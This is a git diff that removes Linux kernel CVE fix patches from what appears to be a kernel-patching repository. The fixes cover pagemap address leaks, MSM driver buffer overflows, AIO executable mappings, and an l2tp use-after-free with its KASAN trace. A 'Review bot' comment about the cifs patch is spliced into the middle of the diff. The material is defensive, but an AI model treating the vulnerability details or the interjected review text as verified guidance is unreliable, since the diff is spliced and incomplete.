-From ab676b7d6fbf4b294bf198fb27ade5b0e865c7ce Mon Sep 17 00:00:00 2001
-From: "Kirill A. Shutemov"
-Date: Mon, 9 Mar 2015 23:11:12 +0200
-Subject: pagemap: do not leak physical addresses to non-privileged userspace
-
-As pointed by recent post[1] on exploiting DRAM physical imperfection,
-/proc/PID/pagemap exposes sensitive information which can be used to do
-attacks.
-
-This disallows anybody without CAP_SYS_ADMIN to read the pagemap.
-
-[1] http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
-
-[ Eventually we might want to do anything more finegrained, but for now
- this is the simple model. - Linus ]
-
-Signed-off-by: Kirill A. Shutemov
-Acked-by: Konstantin Khlebnikov
-Acked-by: Andy Lutomirski
-Cc: Pavel Emelyanov
-Cc: Andrew Morton
-Cc: Mark Seaborn
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
----
- fs/proc/task_mmu.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
-index 956b75d..6dee68d 100644
---- a/fs/proc/task_mmu.c
-+++ b/fs/proc/task_mmu.c
-@@ -1325,6 +1325,9 @@ out:
-
- static int pagemap_open(struct inode *inode, struct file *file)
- {
-+ /* do not disclose physical addresses: attack vector */
-+ if (!capable(CAP_SYS_ADMIN))
-+ return -EPERM;
- pr_warn_once("Bits 55-60 of /proc/PID/pagemap entries are about "
- "to stop being page-shift some time soon. See the "
- "linux/Documentation/vm/pagemap.txt for details.\n");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0843/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0843/ANY/0001.patch
deleted file mode 100644
index 34dc4591..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0843/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From a599a7a83745820b3e1bee9d4b625bd54337e4d0 Mon Sep 17 00:00:00 2001
-From: Kishor PK
-Date: Thu, 18 Feb 2016 15:26:50 +0530
-Subject: msm: perf: validate input argument of ev_constraints functions
-
-Validate input argument before writing into
-pmu_constraints_codes array.
-
-CRs-Fixed: 975404
-Change-Id: Id68b1d2201ab1af783af2236833b1dc894e08cc7
-Signed-off-by: Kishor PK
----
- arch/arm/mach-msm/perf_event_msm_krait_l2.c | 23 +++++++++++++++++------
- 1 file changed, 17 insertions(+), 6 deletions(-)
-
-diff --git a/arch/arm/mach-msm/perf_event_msm_krait_l2.c b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-index 65a5d2f..43233ab 100644
---- a/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-+++ b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011,2012,2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011,2012,2014,2016 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -18,13 +18,15 @@
-
- #include
-
-+#define PMU_CODES_SIZE 64
-+
- /*
- * The L2 PMU is shared between all CPU's, so protect
- * its bitmap access.
- */
- struct pmu_constraints {
- u64 pmu_bitmap;
-- u8 codes[64];
-+ u8 codes[PMU_CODES_SIZE];
- raw_spinlock_t lock;
- } l2_pmu_constraints = {
- .pmu_bitmap = 0,
-@@ -427,10 +429,9 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event)
- u8 group = evt_type & 0x0000F;
- u8 code = (evt_type & 0x00FF0) >> 4;
- unsigned long flags;
-- u32 err = 0;
-+ int err = 0;
- u64 bitmap_t;
- u32 shift_idx;
--
- if (evt_prefix == L2_TRACECTR_PREFIX)
- return err;
- /*
-@@ -444,6 +445,11 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event)
-
- shift_idx = ((reg * 4) + group);
-
-+ if (shift_idx >= PMU_CODES_SIZE) {
-+ err = -EINVAL;
-+ goto out;
-+ }
-+
- bitmap_t = 1 << shift_idx;
-
- if (!(l2_pmu_constraints.pmu_bitmap & bitmap_t)) {
-@@ -484,6 +490,7 @@ static int msm_l2_clear_ev_constraint(struct perf_event *event)
- unsigned long flags;
- u64 bitmap_t;
- u32 shift_idx;
-+ int err = 1;
-
- if (evt_prefix == L2_TRACECTR_PREFIX)
- return 1;
-@@ -491,6 +498,10 @@ static int msm_l2_clear_ev_constraint(struct perf_event *event)
-
- shift_idx = ((reg * 4) + group);
-
-+ if (shift_idx >= PMU_CODES_SIZE) {
-+ err = -EINVAL;
-+ goto out;
-+ }
- bitmap_t = 1 << shift_idx;
-
- /* Clear constraint bit. */
-@@ -498,9 +509,9 @@ static int msm_l2_clear_ev_constraint(struct perf_event *event)
-
- /* Clear code. */
- l2_pmu_constraints.codes[shift_idx] = -1;
--
-+out:
- raw_spin_unlock_irqrestore(&l2_pmu_constraints.lock, flags);
-- return 1;
-+ return err;
- }
-
- int get_num_events(void)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0844/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0844/ANY/0001.patch
deleted file mode 100644
index dcc9705e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0844/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 90a9da2ea95e86b4f0ff493cd891a11da0ee67aa Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Tue, 29 Dec 2015 18:50:34 -0800
-Subject: msm: ipa: fix the mux_channel buffer overflow
-
-Add the check on ipa wan-driver to check if
-receiving more than MAX_NUM_OF_MUX_CHANNEL times
-different RMNET_IOCTL_ADD_MUX_CHANNEL ioctls
-from netmgrd.
-
-CRs-Fixed: 956393
-Change-Id: Ic8890b084a8da69fdcf54541e82f6e4961492ce1
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c | 7 ++++++-
- drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c | 6 ++++++
- 2 files changed, 12 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-index e30d6d1..f3b883e 100644
---- a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1366,6 +1366,11 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- rmnet_mux_val.mux_id);
- return rc;
- }
-+ if (rmnet_index >= MAX_NUM_OF_MUX_CHANNEL) {
-+ IPAWANERR("Exceed mux_channel limit(%d)\n",
-+ rmnet_index);
-+ return -EFAULT;
-+ }
- IPAWANDBG("ADD_MUX_CHANNEL(%d, name: %s)\n",
- extend_ioctl_data.u.rmnet_mux_val.mux_id,
- extend_ioctl_data.u.rmnet_mux_val.vchannel_name);
-diff --git a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-index 9697590..2c3e18e 100644
---- a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-@@ -1382,6 +1382,12 @@ static int ipa3_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- rmnet_mux_val.mux_id);
- return rc;
- }
-+ if (rmnet_ipa3_ctx->rmnet_index
-+ >= MAX_NUM_OF_MUX_CHANNEL) {
-+ IPAWANERR("Exceed mux_channel limit(%d)\n",
-+ rmnet_ipa3_ctx->rmnet_index);
-+ return -EFAULT;
-+ }
- IPAWANDBG("ADD_MUX_CHANNEL(%d, name: %s)\n",
- extend_ioctl_data.u.rmnet_mux_val.mux_id,
- extend_ioctl_data.u.rmnet_mux_val.vchannel_name);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0001.patch
deleted file mode 100644
index ef0ce520..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0001.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-From 22f6b4d34fcf039c63a94e7670e0da24f8575a5a Mon Sep 17 00:00:00 2001
-From: Jann Horn
-Date: Fri, 16 Sep 2016 00:31:22 +0200
-Subject: aio: mark AIO pseudo-fs noexec
-
-This ensures that do_mmap() won't implicitly make AIO memory mappings
-executable if the READ_IMPLIES_EXEC personality flag is set. Such
-behavior is problematic because the security_mmap_file LSM hook doesn't
-catch this case, potentially permitting an attacker to bypass a W^X
-policy enforced by SELinux.
-
-I have tested the patch on my machine.
-
-To test the behavior, compile and run this:
-
- #define _GNU_SOURCE
- #include
- #include
- #include
- #include
- #include
- #include
- #include
-
- int main(void) {
- personality(READ_IMPLIES_EXEC);
- aio_context_t ctx = 0;
- if (syscall(__NR_io_setup, 1, &ctx))
- err(1, "io_setup");
-
- char cmd[1000];
- sprintf(cmd, "cat /proc/%d/maps | grep -F '/[aio]'",
- (int)getpid());
- system(cmd);
- return 0;
- }
-
-In the output, "rw-s" is good, "rwxs" is bad.
-
-Signed-off-by: Jann Horn
-Signed-off-by: Linus Torvalds
----
- fs/aio.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index fb8e45b..4fe81d1 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -239,7 +239,12 @@ static struct dentry *aio_mount(struct file_system_type *fs_type,
- static const struct dentry_operations ops = {
- .d_dname = simple_dname,
- };
-- return mount_pseudo(fs_type, "aio:", NULL, &ops, AIO_RING_MAGIC);
-+ struct dentry *root = mount_pseudo(fs_type, "aio:", NULL, &ops,
-+ AIO_RING_MAGIC);
-+
-+ if (!IS_ERR(root))
-+ root->d_sb->s_iflags |= SB_I_NOEXEC;
-+ return root;
- }
-
- /* aio_setup
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch
deleted file mode 100644
index 30a1f7d8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/fs/aio.c b/fs/aio.c
-index d991255..3eec984 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -229,6 +229,7 @@
- aio_mnt = kern_mount(&aio_fs);
- if (IS_ERR(aio_mnt))
- panic("Failed to create aio fs mount.");
-+ aio_mnt->mnt_flags |= MNT_NOEXEC;
-
- if (bdi_init(&aio_fs_backing_dev_info))
- panic("Failed to init aio fs backing dev info.");
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch.base64
deleted file mode 100644
index 4d91251e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2ZzL2Fpby5jIGIvZnMvYWlvLmMKaW5kZXggZDk5MTI1NS4uM2VlYzk4NCAxMDA2NDQKLS0tIGEvZnMvYWlvLmMKKysrIGIvZnMvYWlvLmMKQEAgLTIyOSw2ICsyMjksNyBAQAogCWFpb19tbnQgPSBrZXJuX21vdW50KCZhaW9fZnMpOwogCWlmIChJU19FUlIoYWlvX21udCkpCiAJCXBhbmljKCJGYWlsZWQgdG8gY3JlYXRlIGFpbyBmcyBtb3VudC4iKTsKKwlhaW9fbW50LT5tbnRfZmxhZ3MgfD0gTU5UX05PRVhFQzsKIAogCWlmIChiZGlfaW5pdCgmYWlvX2ZzX2JhY2tpbmdfZGV2X2luZm8pKQogCQlwYW5pYygiRmFpbGVkIHRvIGluaXQgYWlvIGZzIGJhY2tpbmcgZGV2IGluZm8uIik7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch
deleted file mode 100644
index ea964df1..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch
+++ /dev/null
@@ -1,22 +0,0 @@
-diff --git a/fs/aio.c b/fs/aio.c
-index 9798d4e..0f2c38f 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -35,6 +35,7 @@
- #include
- #include
- #include
-+#include
-
- #include
- #include
-@@ -153,6 +154,9 @@
- unsigned long size, populate;
- int nr_pages;
-
-+ if (current->personality & READ_IMPLIES_EXEC)
-+ return -EPERM;
-+
- /* Compensate for the ring buffer's head/tail overlap entry */
- nr_events += 2; /* 1 is required, 2 for good luck */
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch.base64 deleted file mode 100644 index b74cf0b4..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL2ZzL2Fpby5jIGIvZnMvYWlvLmMKaW5kZXggOTc5OGQ0ZS4uMGYyYzM4ZiAxMDA2NDQKLS0tIGEvZnMvYWlvLmMKKysrIGIvZnMvYWlvLmMKQEAgLTM1LDYgKzM1LDcgQEAKICNpbmNsdWRlIDxsaW51eC9ldmVudGZkLmg+CiAjaW5jbHVkZSA8bGludXgvYmxrZGV2Lmg+CiAjaW5jbHVkZSA8bGludXgvY29tcGF0Lmg+CisjaW5jbHVkZSA8bGludXgvcGVyc29uYWxpdHkuaD4KIAogI2luY2x1ZGUgPGFzbS9rbWFwX3R5cGVzLmg+CiAjaW5jbHVkZSA8YXNtL3VhY2Nlc3MuaD4KQEAgLTE1Myw2ICsxNTQsOSBAQAogCXVuc2lnbmVkIGxvbmcgc2l6ZSwgcG9wdWxhdGU7CiAJaW50IG5yX3BhZ2VzOwogCisJaWYgKGN1cnJlbnQtPnBlcnNvbmFsaXR5ICYgUkVBRF9JTVBMSUVTX0VYRUMpCisJCXJldHVybiAtRVBFUk07CisKIAkvKiBDb21wZW5zYXRlIGZvciB0aGUgcmluZyBidWZmZXIncyBoZWFkL3RhaWwgb3ZlcmxhcCBlbnRyeSAqLwogCW5yX2V2ZW50cyArPSAyOwkvKiAxIGlzIHJlcXVpcmVkLCAyIGZvciBnb29kIGx1Y2sgKi8KIAo= \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-10088/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10088/ANY/0001.patch deleted file mode 100644 index 695b415d..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10088/ANY/0001.patch +++ /dev/null 
@@ -1,48 +0,0 @@
-From 128394eff343fc6d2f32172f03e24829539c5835 Mon Sep 17 00:00:00 2001
-From: Al Viro
-Date: Fri, 16 Dec 2016 13:42:06 -0500
-Subject: sg_write()/bsg_write() is not fit to be called under KERNEL_DS
-
-Both damn things interpret userland pointers embedded into the payload;
-worse, they are actually traversing those. Leaving aside the bad
-API design, this is very much _not_ safe to call with KERNEL_DS.
-Bail out early if that happens.
-
-Cc: stable@vger.kernel.org
-Signed-off-by: Al Viro
----
- block/bsg.c | 3 +++
- drivers/scsi/sg.c | 3 +++
- 2 files changed, 6 insertions(+)
-
-diff --git a/block/bsg.c b/block/bsg.c
-index 8a05a40..a57046d 100644
---- a/block/bsg.c
-+++ b/block/bsg.c
-@@ -655,6 +655,9 @@ bsg_write(struct file *file, const char __user *buf, size_t count, loff_t *ppos)
-
- dprintk("%s: write %Zd bytes\n", bd->name, count);
-
-+ if (unlikely(segment_eq(get_fs(), KERNEL_DS)))
-+ return -EINVAL;
-+
- bsg_set_block(bd, file);
-
- bytes_written = 0;
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 070332e..dbe5b4b 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -581,6 +581,9 @@ sg_write(struct file *filp, const char __user *buf, size_t count, loff_t * ppos)
- sg_io_hdr_t *hp;
- unsigned char cmnd[SG_MAX_CDB_SIZE];
-
-+ if (unlikely(segment_eq(get_fs(), KERNEL_DS)))
-+ return -EINVAL;
-+
- if ((!(sfp = (Sg_fd *) filp->private_data)) || (!(sdp = sfp->parentdp)))
- return -ENXIO;
- SCSI_LOG_TIMEOUT(3, sg_printk(KERN_INFO, sdp,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10153/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2016-10153/4.9/0001.patch
deleted file mode 100644
index ee3c5296..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10153/4.9/0001.patch
+++ /dev/null
@@ -1,144 +0,0 @@
-From a45f795c65b479b4ba107b6ccde29b896d51ee98 Mon Sep 17 00:00:00 2001
-From: Ilya Dryomov
-Date: Fri, 2 Dec 2016 16:35:07 +0100
-Subject: libceph: introduce ceph_crypt() for in-place en/decryption
-
-Starting with 4.9, kernel stacks may be vmalloced and therefore not
-guaranteed to be physically contiguous; the new CONFIG_VMAP_STACK
-option is enabled by default on x86. This makes it invalid to use
-on-stack buffers with the crypto scatterlist API, as sg_set_buf()
-expects a logical address and won't work with vmalloced addresses.
-
-There isn't a different (e.g. kvec-based) crypto API we could switch
-net/ceph/crypto.c to and the current scatterlist.h API isn't getting
-updated to accommodate this use case. Allocating a new header and
-padding for each operation is a non-starter, so do the en/decryption
-in-place on a single pre-assembled (header + data + padding) heap
-buffer. This is explicitly supported by the crypto API:
-
- "... the caller may provide the same scatter/gather list for the
- plaintext and cipher text. After the completion of the cipher
- operation, the plaintext data is replaced with the ciphertext data
- in case of an encryption and vice versa for a decryption."
-
-Signed-off-by: Ilya Dryomov
-Reviewed-by: Sage Weil
----
- net/ceph/crypto.c | 87 +++++++++++++++++++++++++++++++++++++++++++++++++++++++
- net/ceph/crypto.h | 2 ++
- 2 files changed, 89 insertions(+)
-
-diff --git a/net/ceph/crypto.c b/net/ceph/crypto.c
-index db2847a..32099c5 100644
---- a/net/ceph/crypto.c
-+++ b/net/ceph/crypto.c
-@@ -526,6 +526,93 @@ int ceph_encrypt2(struct ceph_crypto_key *secret, void *dst, size_t *dst_len,
- }
- }
-
-+static int ceph_aes_crypt(const struct ceph_crypto_key *key, bool encrypt,
-+ void *buf, int buf_len, int in_len, int *pout_len)
-+{
-+ struct crypto_skcipher *tfm = ceph_crypto_alloc_cipher();
-+ SKCIPHER_REQUEST_ON_STACK(req, tfm);
-+ struct sg_table sgt;
-+ struct scatterlist prealloc_sg;
-+ char iv[AES_BLOCK_SIZE];
-+ int pad_byte = AES_BLOCK_SIZE - (in_len & (AES_BLOCK_SIZE - 1));
-+ int crypt_len = encrypt ? in_len + pad_byte : in_len;
-+ int ret;
-+
-+ if (IS_ERR(tfm))
-+ return PTR_ERR(tfm);
-+
-+ WARN_ON(crypt_len > buf_len);
-+ if (encrypt)
-+ memset(buf + in_len, pad_byte, pad_byte);
-+ ret = setup_sgtable(&sgt, &prealloc_sg, buf, crypt_len);
-+ if (ret)
-+ goto out_tfm;
-+
-+ crypto_skcipher_setkey((void *)tfm, key->key, key->len);
-+ memcpy(iv, aes_iv, AES_BLOCK_SIZE);
-+
-+ skcipher_request_set_tfm(req, tfm);
-+ skcipher_request_set_callback(req, 0, NULL, NULL);
-+ skcipher_request_set_crypt(req, sgt.sgl, sgt.sgl, crypt_len, iv);
-+
-+ /*
-+ print_hex_dump(KERN_ERR, "key: ", DUMP_PREFIX_NONE, 16, 1,
-+ key->key, key->len, 1);
-+ print_hex_dump(KERN_ERR, " in: ", DUMP_PREFIX_NONE, 16, 1,
-+ buf, crypt_len, 1);
-+ */
-+ if (encrypt)
-+ ret = crypto_skcipher_encrypt(req);
-+ else
-+ ret = crypto_skcipher_decrypt(req);
-+ skcipher_request_zero(req);
-+ if (ret) {
-+ pr_err("%s %scrypt failed: %d\n", __func__,
-+ encrypt ? "en" : "de", ret);
-+ goto out_sgt;
-+ }
-+ /*
-+ print_hex_dump(KERN_ERR, "out: ", DUMP_PREFIX_NONE, 16, 1,
-+ buf, crypt_len, 1);
-+ */
-+
-+ if (encrypt) {
-+ *pout_len = crypt_len;
-+ } else {
-+ pad_byte = *(char *)(buf + in_len - 1);
-+ if (pad_byte > 0 && pad_byte <= AES_BLOCK_SIZE &&
-+ in_len >= pad_byte) {
-+ *pout_len = in_len - pad_byte;
-+ } else {
-+ pr_err("%s got bad padding %d on in_len %d\n",
-+ __func__, pad_byte, in_len);
-+ ret = -EPERM;
-+ goto out_sgt;
-+ }
-+ }
-+
-+out_sgt:
-+ teardown_sgtable(&sgt);
-+out_tfm:
-+ crypto_free_skcipher(tfm);
-+ return ret;
-+}
-+
-+int ceph_crypt(const struct ceph_crypto_key *key, bool encrypt,
-+ void *buf, int buf_len, int in_len, int *pout_len)
-+{
-+ switch (key->type) {
-+ case CEPH_CRYPTO_NONE:
-+ *pout_len = in_len;
-+ return 0;
-+ case CEPH_CRYPTO_AES:
-+ return ceph_aes_crypt(key, encrypt, buf, buf_len, in_len,
-+ pout_len);
-+ default:
-+ return -ENOTSUPP;
-+ }
-+}
-+
- static int ceph_key_preparse(struct key_preparsed_payload *prep)
- {
- struct ceph_crypto_key *ckey;
-diff --git a/net/ceph/crypto.h b/net/ceph/crypto.h
-index 2e9cab0..73da34e 100644
---- a/net/ceph/crypto.h
-+++ b/net/ceph/crypto.h
-@@ -43,6 +43,8 @@ int ceph_encrypt2(struct ceph_crypto_key *secret,
- void *dst, size_t *dst_len,
- const void *src1, size_t src1_len,
- const void *src2, size_t src2_len);
-+int ceph_crypt(const struct ceph_crypto_key *key, bool encrypt,
-+ void *buf, int buf_len, int in_len, int *pout_len);
- int ceph_crypto_init(void);
- void ceph_crypto_shutdown(void);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10154/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2016-10154/4.9/0001.patch
deleted file mode 100644
index 084f55e0..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10154/4.9/0001.patch
+++ /dev/null
@@ -1,93 +0,0 @@ -From 06deeec77a5a689cc94b21a8a91a76e42176685d Mon Sep 17 00:00:00 2001 -From: Andy Lutomirski -Date: Mon, 12 Dec 2016 12:54:37 -0800 -Subject: cifs: Fix smbencrypt() to stop pointing a scatterlist at the stack - -smbencrypt() points a scatterlist to the stack, which is breaks if -CONFIG_VMAP_STACK=y. - -Fix it by switching to crypto_cipher_encrypt_one(). The new code -should be considerably faster as an added benefit. - -This code is nearly identical to some code that Eric Biggers -suggested. - -Cc: stable@vger.kernel.org # 4.9 only -Reported-by: Eric Biggers -Signed-off-by: Andy Lutomirski -Acked-by: Jeff Layton -Signed-off-by: Steve French ---- - fs/cifs/smbencrypt.c | 40 ++++++++-------------------------------- - 1 file changed, 8 insertions(+), 32 deletions(-) - -diff --git a/fs/cifs/smbencrypt.c b/fs/cifs/smbencrypt.c -index 699b786..c12bffe 100644 ---- a/fs/cifs/smbencrypt.c -+++ b/fs/cifs/smbencrypt.c -@@ -23,7 +23,7 @@ - Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. 
- */ - --#include -+#include - #include - #include - #include -@@ -69,46 +69,22 @@ str_to_key(unsigned char *str, unsigned char *key) - static int - smbhash(unsigned char *out, const unsigned char *in, unsigned char *key) - { -- int rc; - unsigned char key2[8]; -- struct crypto_skcipher *tfm_des; -- struct scatterlist sgin, sgout; -- struct skcipher_request *req; -+ struct crypto_cipher *tfm_des; - - str_to_key(key, key2); - -- tfm_des = crypto_alloc_skcipher("ecb(des)", 0, CRYPTO_ALG_ASYNC); -+ tfm_des = crypto_alloc_cipher("des", 0, 0); - if (IS_ERR(tfm_des)) { -- rc = PTR_ERR(tfm_des); -- cifs_dbg(VFS, "could not allocate des crypto API\n"); -- goto smbhash_err; -- } -- -- req = skcipher_request_alloc(tfm_des, GFP_KERNEL); -- if (!req) { -- rc = -ENOMEM; - cifs_dbg(VFS, "could not allocate des crypto API\n"); -- goto smbhash_free_skcipher; -+ return PTR_ERR(tfm_des); - } - -- crypto_skcipher_setkey(tfm_des, key2, 8); -- -- sg_init_one(&sgin, in, 8); -- sg_init_one(&sgout, out, 8); -+ crypto_cipher_setkey(tfm_des, key2, 8); -+ crypto_cipher_encrypt_one(tfm_des, out, in); -+ crypto_free_cipher(tfm_des); - -- skcipher_request_set_callback(req, 0, NULL, NULL); -- skcipher_request_set_crypt(req, &sgin, &sgout, 8, NULL); -- -- rc = crypto_skcipher_encrypt(req); -- if (rc) -- cifs_dbg(VFS, "could not encrypt crypt key rc: %d\n", rc); -- -- skcipher_request_free(req); -- --smbhash_free_skcipher: -- crypto_free_skcipher(tfm_des); --smbhash_err: -- return rc; -+ return 0; - } - - static int --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10200/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10200/ANY/0001.patch deleted file mode 100644 index 6ed7d488..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10200/ANY/0001.patch +++ /dev/null 
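Review bot: In the embedded fs/cifs/smbencrypt.c patch, the rewritten smbhash() discards the result of `crypto_cipher_setkey(tfm_des, key2, 8);` and then returns 0 unconditionally, so a rejected key would still produce output that callers treat as valid. Capturing the result, for example `rc = crypto_cipher_setkey(tfm_des, key2, 8);`, and calling `crypto_cipher_encrypt_one()` only when `rc` is 0 keeps the error path the old code had for the encrypt step. The expanded DES key in `key2` also stays on the stack after the call; `memzero_explicit(key2, sizeof(key2));` before returning would avoid leaving key material behind.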
@@ -1,167 +0,0 @@ -From 32c231164b762dddefa13af5a0101032c70b50ef Mon Sep 17 00:00:00 2001 -From: Guillaume Nault -Date: Fri, 18 Nov 2016 22:13:00 +0100 -Subject: l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() - -Lock socket before checking the SOCK_ZAPPED flag in l2tp_ip6_bind(). -Without lock, a concurrent call could modify the socket flags between -the sock_flag(sk, SOCK_ZAPPED) test and the lock_sock() call. This way, -a socket could be inserted twice in l2tp_ip6_bind_table. Releasing it -would then leave a stale pointer there, generating use-after-free -errors when walking through the list or modifying adjacent entries. - -BUG: KASAN: use-after-free in l2tp_ip6_close+0x22e/0x290 at addr ffff8800081b0ed8 -Write of size 8 by task syz-executor/10987 -CPU: 0 PID: 10987 Comm: syz-executor Not tainted 4.8.0+ #39 -Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 - ffff880031d97838 ffffffff829f835b ffff88001b5a1640 ffff8800081b0ec0 - ffff8800081b15a0 ffff8800081b6d20 ffff880031d97860 ffffffff8174d3cc - ffff880031d978f0 ffff8800081b0e80 ffff88001b5a1640 ffff880031d978e0 -Call Trace: - [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 - [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 - [< inline >] print_address_description mm/kasan/report.c:194 - [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 - [< inline >] kasan_report mm/kasan/report.c:303 - [] __asan_report_store8_noabort+0x3e/0x40 mm/kasan/report.c:329 - [< inline >] __write_once_size ./include/linux/compiler.h:249 - [< inline >] __hlist_del ./include/linux/list.h:622 - [< inline >] hlist_del_init ./include/linux/list.h:637 - [] l2tp_ip6_close+0x22e/0x290 net/l2tp/l2tp_ip6.c:239 - [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 - [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 - [] sock_release+0x8d/0x1d0 net/socket.c:570 - [] sock_close+0x16/0x20 net/socket.c:1017 - [] __fput+0x28c/0x780 fs/file_table.c:208 - [] 
____fput+0x15/0x20 fs/file_table.c:244 - [] task_work_run+0xf9/0x170 - [] do_exit+0x85e/0x2a00 - [] do_group_exit+0x108/0x330 - [] get_signal+0x617/0x17a0 kernel/signal.c:2307 - [] do_signal+0x7f/0x18f0 - [] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156 - [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 - [] syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259 - [] entry_SYSCALL_64_fastpath+0xc4/0xc6 -Object at ffff8800081b0ec0, in cache L2TP/IPv6 size: 1448 -Allocated: -PID = 10987 - [ 1116.897025] [] save_stack_trace+0x16/0x20 - [ 1116.897025] [] save_stack+0x46/0xd0 - [ 1116.897025] [] kasan_kmalloc+0xad/0xe0 - [ 1116.897025] [] kasan_slab_alloc+0x12/0x20 - [ 1116.897025] [< inline >] slab_post_alloc_hook mm/slab.h:417 - [ 1116.897025] [< inline >] slab_alloc_node mm/slub.c:2708 - [ 1116.897025] [< inline >] slab_alloc mm/slub.c:2716 - [ 1116.897025] [] kmem_cache_alloc+0xc8/0x2b0 mm/slub.c:2721 - [ 1116.897025] [] sk_prot_alloc+0x69/0x2b0 net/core/sock.c:1326 - [ 1116.897025] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 - [ 1116.897025] [] inet6_create+0x2d7/0x1000 net/ipv6/af_inet6.c:182 - [ 1116.897025] [] __sock_create+0x37b/0x640 net/socket.c:1153 - [ 1116.897025] [< inline >] sock_create net/socket.c:1193 